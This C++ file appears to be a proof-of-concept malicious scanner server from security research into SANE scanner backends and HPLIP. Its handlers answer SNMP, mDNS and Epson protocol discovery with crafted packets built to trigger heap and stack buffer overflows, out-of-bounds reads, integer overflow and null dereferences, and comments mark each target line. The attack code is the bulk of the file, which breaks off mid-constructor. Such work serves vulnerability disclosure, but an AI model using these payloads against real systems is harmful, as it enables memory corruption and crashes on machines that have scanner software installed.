#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <assert.h>
#include <sys/epoll.h>
#include <netdb.h>
#include <unistd.h>
#include <algorithm>
#include "utils.hpp"

#define ASN_BOOLEAN         0x01
#define ASN_INTEGER         0x02
#define ASN_BIT_STR         0x03
#define ASN_OCTET_STR       0x04
#define ASN_NULL            0x05
#define ASN_OBJECT_ID       0x06
#define ASN_SEQUENCE        0x10
#define ASN_SET             0x11

#define ASN_UNIVERSAL       0x00
#define ASN_APPLICATION     0x40
#define ASN_CONTEXT         0x80
#define ASN_PRIVATE         0xC0

#define ASN_PRIMITIVE       0x00
#define ASN_CONSTRUCTOR     0x20
#define ASN_LONG_LEN        0x80
#define ASN_EXTENSION_ID    0x1F
#define ASN_BIT8            0x80

#define ASN_COUNTER         (ASN_APPLICATION | 1)

#define SNMP_MSG_GET        (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x0)
#define SNMP_MSG_GETNEXT    (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x1)
#define SNMP_MSG_RESPONSE   (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x2)
#define SNMP_MSG_SET        (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x3)
#define SNMP_MSG_TRAP       (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x4)
#define SNMP_MSG_GETBULK    (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x5)
#define SNMP_MSG_INFORM     (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x6)
#define SNMP_MSG_TRAP2      (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x7)
#define SNMP_MSG_REPORT     (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x8)

// This SNMP handler is the first stage of the Magicolor code.  The code in
// magicolor.c uses libsnmp to search the network for scanners. The
// response uses asn1 encoding, but I didn't find any bugs in the asn1
// parser. There is a minor bug in mc_network_discovery_handle though:
//
// magicolor.c:1915
//   cap = mc_get_device_from_identification (device);
//
// `device` is an uninitialized local variable. Ironically, this bug
// gets cancelled by another bug in mc_get_device_from_identification:
//
//  static struct MagicolorCap *
//  mc_get_device_from_identification (const char*ident)
//  {
//          int n;
//          for (n = 0; n < NELEMS (magicolor_cap); n++) {
//                  if (strcmp (magicolor_cap[n].model, ident) || strcmp (magicolor_cap[n].OID, ident))
//                          return &magicolor_cap[n];
//          }
//          return NULL;
//  }
//
// The bug is that strcmp returns 0 when the strings are equal, so this
// function always succeeds immediately on the first iteration of the loop,
// even when `ident` contains garbage (which it does because it's
// uninitialized).
class SNMPHandlerUDP : public RecvHandlerUDP {
public:
  SNMPHandlerUDP() {}
  virtual ~SNMPHandlerUDP() {}

  virtual int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    printf("SNMP discover ");
    print_addr(peer_addr, peer_addr_len);
    printf("\n");
    ssize_t i;
    for (i = 0; i < len; i++) {
      printf("%.2x", buf[i]);
    }
    printf("\n");

#define PAYLOAD_SIZE 16

    const uint8_t response[] =
      { 48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        (3 + 11 + 1) + (1 + 23 + 2 + (2 + 8 + 15) + 2 + (2 + 8 + 2 + PAYLOAD_SIZE)), // Total length
        ASN_INTEGER, 1, 1, // Version number = 1
        ASN_OCTET_STR, 9, 'k','e','v','w','o','z','e','r','e',
        SNMP_MSG_TRAP, // We have a choice here
        23 + 2 + (2 + 8 + 15) + 2 + (2 + 8 + 2 + PAYLOAD_SIZE),
        ASN_OBJECT_ID,
        4, 20,21,22,23, // objid of length 4
        ASN_OCTET_STR, 4, 'k','e','v','w',
        ASN_INTEGER, 1, 1, // pdu->trap_type = 1
        ASN_INTEGER, 1, 1, // pdu->specific_type = 1
        ASN_COUNTER, 1, 1,  // pdu->time = 1
        48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        2 + (2 + 8 + 15) + 2 + (2 + 8 + 2 + PAYLOAD_SIZE), // Length of varbind sequence.
        48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        2 + 8 + 15,
        ASN_OBJECT_ID,
        8, 0x2B, 6, 1, 2, 1, 1, 2, 0, // objid of length 8 (MAGICOLOR_SNMP_SYSOBJECT_OID)
        ASN_OBJECT_ID, 13, 0x2B, 6, 1, 4, 1, // objid of length 13 (MAGICOLOR_SNMP_DEVICE_TREE)
          0x81, 0x8F, 0x1E, // 18834
          1, 1, 1, 1, 1,
        48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        2 + 8 + 2 + PAYLOAD_SIZE,
        ASN_OBJECT_ID,
        8, 0x2B, 6, 1, 2, 1, 1, 1, 0, // objid of length 8 (MAGICOLOR_SNMP_SYSDESCR_OID)
        ASN_OCTET_STR, PAYLOAD_SIZE,
        'A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A'
      };

    printf("sizeof(response) = %ld\n", sizeof(response));
    sock.replyto(
      (const char*)response, sizeof(response),
      peer_addr, peer_addr_len
    );

    return 0;
  }
};

// This handler accepts a connection from magicolor.c.  It just contains
// the basic logic to handle the initial handshake and doesn't do anything
// deliberately malicious.  But if you press the "Scan" button after the
// connection is complete, then simple-scan crashes with a SIGFPE at
// magicolor.c, line 1146:
//
// s->block_len = (int)(0xff00/s->scan_bytes_per_line) * s->scan_bytes_per_line;
//
// The crash happens because `scan_bytes_per_line` is zero.  I believe
// that's because this handler responds to the cmd_get_scanning_parameters
// (magicolor.c:815) with a buffer full of zeros. Note: this TCP handler is
// very incomplete and doesn't parse the Magicolor messages properly, so it
// mistakenly thinks that it's handling another connection handshake when
// it's actually handling a scanning attempt. The buffer full of zeros is
// sent by the `S_fin` logic.
class MagicolorHandlerTCP : public RecvHandlerTCP {
  enum State {
    S_ack,
    S_err1,
    S_fin,
    S_err2,
    S_close
  };

  State state_;

public:
  MagicolorHandlerTCP() : state_(S_ack) {}

  virtual ssize_t accept(SocketHandlerTCP& sock) override {
    printf("Sending welcome message.\n");

    // Send back a welcome message.
    const char reply[3] = {4,0,0};
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    state_ = S_ack;
    return 5;
  }

  virtual ssize_t receive(SocketHandlerTCP& sock, const uint8_t*) override {
    switch (state_) {
    case S_ack:
    {
      // Send back the ack message.
      printf("magicolor ack\n");
      const char reply[3] = {4,2,0};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = S_err1;
      return 64;
    }

    case S_err1:
    {
      // Send back the error status.
      printf("magicolor err1\n");
      const char reply[1] = {0};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = S_fin;
      return 64;
    }

    case S_fin:
    {
      printf("magicolor fin\n");
      const char reply[0xb] = {0,0,0,0,0,0,0,0,0,0,0};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = S_err2;
      return 64;
    }

    case S_err2:
    {
      // Send back the error status.
      printf("magicolor err2\n");
      const char reply[1] = {0};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = S_close;
      return 3;
    }

    case S_close:
    {
      printf("magicolor close\n");
      state_ = S_ack;
      return -1;
    }

    default:
      return -1;
    }
  }

  virtual void disconnect() override {}
};

class BuildMagicolorHandlerTCP : public BuildRecvHandlerTCP {
public:
  virtual RecvHandlerTCP* build(sockaddr*, socklen_t) override {
    return new MagicolorHandlerTCP();
  }
};

// The exact bytes of the buffer sent by this call (mdns.c:442):
//
//   mdns_send_query(udp_socket, "_scanner._tcp.local", QTYPE_PTR);
//
static const char scanner_tcp_local[37] = {
  0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x08, 0x5f, 0x73, 0x63, 0x61, 0x6e, 0x6e, 0x65, 0x72, 0x04, 0x5f, 0x74,
  0x63, 0x70, 0x05, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x0c, 0x00,
  0x01
};

// The exact bytes of the buffer sent by this call (mdns.c:443):
//
//   mdns_send_query(udp_socket, "_uscan._tcp.local", QTYPE_PTR);
//
static const char uscan_tcp_local[35] = {
  0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x06, 0x5f, 0x75, 0x73, 0x63, 0x61, 0x6e, 0x04, 0x5f, 0x74, 0x63, 0x70,
  0x05, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x0c, 0x00, 0x01
};

class HplipHandler : public RecvHandlerUDP {
  char malicious_response_buf[2048];

  // Trigger a buffer overflow in mdns_readName (mdns.c:191).  The
  // destination buffer is `rr->name`, which is a 256 byte buffer. We will
  // write off the end of it, overwriting the `rr->next` pointer.  The
  // bogus pointer triggers a crash at mdns.c:393.
  static size_t init_buf_heap_overflow(char* buf) {
    size_t pos = 0;
    // id
    buf[pos++] = 0;
    buf[pos++] = 0;
    // flags
    buf[pos++] = 0;
    buf[pos++] = 0;
    // questions
    buf[pos++] = 0;
    buf[pos++] = 1;
    // answers
    buf[pos++] = 0;
    buf[pos++] = 0;
    // authorities
    buf[pos++] = 0;
    buf[pos++] = 0;
    // additionals
    buf[pos++] = 0;
    buf[pos++] = 0;

    // mdns_readName (mdns.c:279)
    buf[pos++] = 0xBF;
    memset(buf + pos, 'x', 0xBF);
    pos += 0xBF;
    buf[pos++] = 0x50;
    memset(buf + pos, 'x', 0x40);
    pos += 0x40;
    ((uint64_t*)(buf + pos))[0] = 0xFEDCBA9876543210;     // pointer to next DNS_RECORD
    ((uint64_t*)(buf + pos))[1] = 604;  // mchunk_size (malloc.c)
    pos += 0x10;
    buf[pos++] = 0; // End the name

    printf("setzero size=%ld\n", pos);
    return pos;
  }

  // Trigger a stack buffer overflow in mdns_update_uris (mdns.c:396).
  static size_t init_buf_stack_smash(char* buf) {
    size_t pos = 0;
    // id
    buf[pos++] = 0;
    buf[pos++] = 0;
    // flags
    buf[pos++] = 0;
    buf[pos++] = 0;
    // questions
    buf[pos++] = 0;
    buf[pos++] = 0;
    // answers
    buf[pos++] = 0;
    buf[pos++] = 0;
    // authorities
    buf[pos++] = 0;
    buf[pos++] = 0;
    // additionals
    buf[pos++] = 0;
    buf[pos++] = 2;

    // mdns_readName (mdns.c:279)
    buf[pos++] = 9;
    memcpy(&buf[pos], "kevwozere", 10);
    pos += 10;

    // type = QTYPE_TXT (16). (mdns.c:280)
    buf[pos++] = 0;
    buf[pos++] = 16;
    pos += 6;

    // data_len = 256. (mdns.c:283)
    buf[pos++] = 1;
    buf[pos++] = 0;

    // mdns_readMDL (mdns.c:204)
    const uint8_t modelLen = 0xFF;
    buf[pos++] = modelLen;
    memcpy(buf + pos, "mdl=", 4);
    pos += 4;
    memset(buf + pos, 'x', modelLen - 4);
    pos += modelLen - 4;

    // mdns_readName (mdns.c:279)
    buf[pos++] = 9;
    memcpy(&buf[pos], "kevwozere", 10);
    pos += 10;

    // type = QTYPE_A (1). (mdns.c:280)
    buf[pos++] = 0;
    buf[pos++] = 1;
    pos += 6;

    // data_len = 4. (mdns.c:283)
    buf[pos++] = 0;
    buf[pos++] = 4;

    // Bogus ip address
    memset(buf + pos, 0xFF, 4);
    pos += 4;

    printf("first response size=%ld\n", pos);
    return pos;
  }

  // Trigger an out of bounds read at mdns.c:279.
  static size_t init_buf_out_of_bounds_read(char* buf) {
    size_t pos = 0;
    // id
    buf[pos++] = 0;
    buf[pos++] = 0;
    // flags
    buf[pos++] = 0;
    buf[pos++] = 0;
    // questions
    buf[pos++] = 0;
    buf[pos++] = 0;
    // answers
    buf[pos++] = 0;
    buf[pos++] = 0;
    // authorities
    buf[pos++] = 0;
    buf[pos++] = 0;
    // additionals
    buf[pos++] = 0;
    buf[pos++] = 2;

    // mdns_readName (mdns.c:279)
    buf[pos++] = 9;
    memcpy(&buf[pos], "kevwozere", 10);
    pos += 10;

    // type = QTYPE_TXT (16). (mdns.c:280)
    buf[pos++] = 0;
    buf[pos++] = 16;
    pos += 6;

    // data_len = 0xFFFF. (mdns.c:283)
    // This causes the pointer `p` to be advanced far beyond the bounds of
    // the buffer, leading to an out of bounds read. This bug does not cause
    // a crash, but it could possibly be used for information disclosure.
    buf[pos++] = 0xFF;
    buf[pos++] = 0xFF;

    // mdns_readMDL (mdns.c:204)
    const uint8_t modelLen = 0xFF;
    buf[pos++] = modelLen;
    memcpy(buf + pos, "mdl=", 4);
    pos += 4;
    memset(buf + pos, 'x', modelLen - 4);
    pos += modelLen - 4;
    return pos;
  }

  static bool parse_packet(const uint8_t* buf, ssize_t size) {
    static const char header[] =
      { 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

    if (size <= (ssize_t)sizeof(header)) {
      return false;
    }

    if (memcmp(buf, header, sizeof(header))) {
      printf("unrecognized header:");
      size_t i;
      for (i = 0; i < sizeof(header); i++) {
        printf(" %.2x", buf[i]);
      }
      printf("\n");
    }

    ssize_t pos = sizeof(header);
    while (1) {
      assert(pos < size);
      uint8_t segsize = buf[pos];
      if (segsize == 0) {
        pos++;
        break;
      }
      pos++;
      assert(pos <= size);
      if (segsize >= size - pos) {
        printf("bad segment size: %d %ld\n", segsize, size-pos);
        return false;
      }
      size_t i;
      printf(".");
      for (i = 0; i < segsize; i++) {
        printf("%c", buf[pos + i]);
      }
      pos += segsize;
    }

    printf("\n");

    // The next 4 bytes are: 0, query_type, 0, QCLASS_IN
    assert(pos <= size);
    if (size - pos < 4) {
      printf("message too short\n");
      return false;
    }
    if (buf[pos] != 0 || buf[pos+2] != 0 || buf[pos+3] != 1) {
      printf("buf[pos..pos+3] = %.02x %.02x %.02x %.02x\n",
             buf[pos], buf[pos+1], buf[pos+2], buf[pos+3]);
    }
    uint8_t query_type = buf[pos+1];
    printf("query_type = %x\n", query_type);
    pos += 4;
    printf("remaining bytes: %ld\n", size-pos);

    ssize_t i;
    for (i = pos; i < size; i++) {
      printf("%.2x", buf[i]);
    }
    printf("\n");

    return (size == pos);
  }

public:
  HplipHandler(int mode) {
    memset(malicious_response_buf, 0, sizeof(malicious_response_buf));
    switch (mode) {
    case 0:
      init_buf_heap_overflow(malicious_response_buf);
      break;
    case 1:
      init_buf_stack_smash(malicious_response_buf);
      break;
    case 2:
      init_buf_out_of_bounds_read(malicious_response_buf);
      break;
    default:
      printf("Invalid hplip mode: %d\n", mode);
      break;
    }
  }

  virtual ~HplipHandler() {}

  virtual int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    print_addr(peer_addr, peer_addr_len);
    parse_packet(buf, len);

    if (len != sizeof(scanner_tcp_local)) {
      // We're not interested in this message.
      return 0;
    }
    if (memcmp(buf, scanner_tcp_local, sizeof(scanner_tcp_local)) != 0) {
      // We're not interested in this message.
      return 0;
    }

    printf("send malicious\n");
    sock.replyto(
      malicious_response_buf, sizeof(malicious_response_buf),
      peer_addr, peer_addr_len
    );
    return 0;
  }
};

static const char epsonp_discover[15] = "EPSONP\x00\xff\x00\x00\x00\x00\x00\x00";

static const char epsonp_response[76] =
  "EPSON                                                                      ";

class EpsonHandlerUDP : public RecvHandlerUDP {
public:
  EpsonHandlerUDP() {}
  virtual ~EpsonHandlerUDP() {}

  virtual int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    print_addr(peer_addr, peer_addr_len);
    if (len != sizeof(epsonp_discover)) {
      // We're not interested in this message.
      return 0;
    }
    if (memcmp(buf, epsonp_discover, sizeof(epsonp_discover)) != 0) {
      // We're not interested in this message.
      return 0;
    }

    printf("EPSON discover\n");
    if (sock.replyto(
          epsonp_response, sizeof(epsonp_response),
          peer_addr,
          peer_addr_len
        ) < 0) {
      printf("failed to send response.\n");
    }

    return 0;
  }
};

class EpsonHandlerTCP : public RecvHandlerTCP {
  enum HdrState {
    H_wait_hdr, // Waiting for the 12 byte header
    H_wait_extra_hdr, // Waiting for the extra 8 header bytes
    H_wait_payload, // Waiting for the message payload
    H_wait_moreinfo // Waiting for the request for more info
  };

  // What type of payload we are expecting.
  enum PayloadState {
    P_normal,
    P_paramblock,
    P_img
  };

  // mode_ is a command line argument, telling us which bug to target.
  const int mode_;

  HdrState state_;
  PayloadState payload_state_;
  uint16_t cmd_;
  uint32_t buf_size_;
  uint32_t reply_len_;

  uint8_t malicious_buf[12 + 0x1271];

  ssize_t send_ack(SocketHandlerTCP& sock) {
    const char reply[13] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0, 6};
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    state_ = H_wait_hdr;
    return 12;
  }

  void send_info_harmless(SocketHandlerTCP& sock, int more) {
    char reply[76] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
       'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
    sprintf(
      &reply[17],
      "%07x#FB AREAi0000850i0001400#PRDh009kevwozere#---", more);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
  }

  ssize_t send_para_response(SocketHandlerTCP& sock) {
    char reply[76] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
       'P','A','R','A','x','0','0','0','0','0','0','0','#','-','-','-',
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = H_wait_hdr;
      payload_state_ = P_normal;
      return 12;
  }

  ssize_t send_img_response(SocketHandlerTCP& sock) {
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(reply_len_);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send a fake image. We specified an enormous image size in
    // the "IMG" case of `eds_send`. (The huge size that we specified
    // is now stored in `reply_len`.) This is going to cause a
    // buffer overflow in esci2_img (epsonds-cmd.c:884).
    char buf[0x10000];
    memset(buf, 0, sizeof(buf));
    uint32_t sentbytes = 0;
    while (sentbytes < reply_len_) {
      const ssize_t wr =
        sock.reply(
          buf, std::min(uint32_t(sizeof(buf)), reply_len_ - sentbytes)
        );
      if (wr < 0) {
        const int err = errno;
        if (err == EAGAIN || err == EWOULDBLOCK) {
          continue;
        } else {
          printf("send failed: %s\n", strerror(err));
          break;
        }
      } else {
        printf("sent image: %ld bytes\n", wr);
      }
      sentbytes += wr;
    }
    printf("total sent: %ld bytes\n", size_t(sentbytes));

    state_ = H_wait_hdr;
    payload_state_ = P_normal;
    return 12;
  }

  ssize_t eds_send(SocketHandlerTCP& sock, const uint8_t* buf) {
    printf("eds_send: %.02x %.02x %.02x\n", buf[0], buf[1], buf[2]);
    if (buf_size_ == 2 && memcmp(buf, "\x1CX", 2) == 0 && reply_len_ == 1) {
      if (mode_ == 2) {
        // Trigger a buffer overflow at epsonds-net.c:135. We control the
        // value of `size`, so we can write an arbitrary amount of data
        // into `s->netbuf`.
        char reply[4096];
        const char header[12] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0};
        memset(reply, 0xcd, sizeof(reply));
        memcpy(reply, header, sizeof(header));
        *(uint32_t*)&reply[6] = htonl(sizeof(reply));
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }

        state_ = H_wait_hdr;
        return 12;
      }
      return send_ack(sock);
    } else if (buf_size_ == 12 && memcmp(buf, "INFOx0000000", 12) == 0 && reply_len_ == 64) {
      if (mode_ == 3) {
        // Copy uninitialized data into the reply buffer at epsonds-net.c:164.
        // Because `size == 0`, no data was read from the network, so `s->netbuf`
        // is still a newly malloc-ed buffer, containing uninitialized bytes.
        char reply[13] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 'K'};
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
      } else if (mode_ == 4) {
        // Out of bounds read in decode_binary (epsonds-cmd.c:273)
        // This will read 0xFFF bytes from the stack and copy it into
        // a malloc-ed buffer.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        int more = 0;
        sprintf(
          &reply[17],
          "%07x#FB AREAi0000850i0001400#PRDhfffkevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
      } else if (mode_ == 5) {
        // Trigger a SIGPIPE in sanei_tcp_write (sanei_tcp.c:120)
        // They should pass the flag MSG_NOSIGNAL to avoid this.
        // Actually, this doesn't cause a crash so this isn't a bug.
        // There must be a signal handler for SIGPIPE.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        sprintf(&reply[17],"%07x#nrdBUSY#---", 0);
        for (size_t i = 0; i < 4; i++) {
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
        }

        // Close the socket, to trigger a SIGPIPE on the other end.
        return -1;
      } else if (mode_ == 6) {
        // Potential information leak from the sscanf at epsonds-cmd.c:120:
        // the %x format specifier reads off the end of the buffer. If the
        // next bytes on the stack are valid ASCII digits then they will
        // be read into `more` and returned to us in the next message.
        char reply[92] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x','0','0','0','0','0','0','0','0','0','0','0',
           '0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0',
           '0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0',
           '0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0'
          };
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
      } else if (mode_ == 7) {
        // Integer overflow in the count parameter of sanei_tcp_read
        // (sanei_tcp.c:124). Also interesting to note that the error
        // is ignored at epsonds-cmd.c:195.
        char reply[76 + 12] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           'I', 'S', 0, 0, 0, 12, -1, -1, -1, -1, 0, 0
          };
        unsigned int more = 0xFFFFFFFF;
        sprintf(
          &reply[17],
          "%08x#FB AREAi0000850i0001400#PRDh009kevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        // Send another byte because `epsonds_net_read_raw` uses `select`
        // to wait until there's more data available before it triggers
        // the call to `sanei_tcp_read`.
        if (sock.reply(reply, 1) < 0) {
          printf("send failed.\n");
        }
      } else {
        send_info_harmless(sock, 0);
      }
      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "CAPAx0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'C','A','P','A','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      int more = 0;
      sprintf(&reply[17], "%07x#RSMRANGi0000050i0000600#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "RESAx0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'R','E','S','A','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      int more = 0;
      sprintf(&reply[17], "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "FIN x0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'F','I','N',' ','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      int more = 0;
      sprintf(&reply[17], "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "TRDTx0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'T','R','D','T','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      int more = 0;
      sprintf(&reply[17], "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "IMG x0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'I','M','G',' ','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };

      // Announce that we're going to send an image with 0x10000000 bytes.
      // The payload will be sent by `send_img_response()`.
      unsigned int more = 0x10000000;
      sprintf(&reply[17], "%08x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      payload_state_ = P_img;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "PARAx", 5) == 0 && reply_len_ == 0) {
      char reply[] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = H_wait_hdr;
      payload_state_ = P_paramblock;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "PARAx", 5) == 0) {
      char reply[] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'P','A','R','A','x','0','0','0','0','0','0','0','#','-','-','-'
        };
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      if (reply_len_ > sizeof(reply)) {
        size_t size = reply_len_ - sizeof(reply);
        char *reply2 = (char*)malloc(size);
        memset(reply2, 0, size);
        if (sock.reply(reply2, size) < 0) {
          printf("send failed.\n");
        }
      }
      state_ = H_wait_hdr;
      return 12;
    } else {
      printf(
        "eds_send unrecognized command: %s\nbuf_size=%d reply_len=%d\n",
        buf, buf_size_, reply_len_);
      return -1;
    }
  }

  ssize_t net_lock(SocketHandlerTCP& sock, const uint8_t* buf) {
    printf("net_lock\n");
    if (mode_ == 1) {
      // Trigger a null pointer exception at epsonds-net.c:160
      const char reply[15] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 'K'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    }

    if (buf_size_ != 7) {
      printf("net_lock unexpected buf_size: %d\n", buf_size_);
      return -1;
    }
    if (memcmp(buf, "\x01\xa0\x04\x00\x00\x01\x2c", 7) != 0) {
      printf("net_lock unexpected payload\n");
      return -1;
    }
    return send_ack(sock);
  }

  ssize_t net_lock_epson2(SocketHandlerTCP& sock) {
    printf("net_lock_epson2\n");
    if (mode_ == 0) {
      // Trigger a null pointer dereference at epson2_net.c:141
      const char reply[13] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 'K'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
    }
    state_ = H_wait_hdr;
    return 12;
  }

public:
  EpsonHandlerTCP(int mode) :
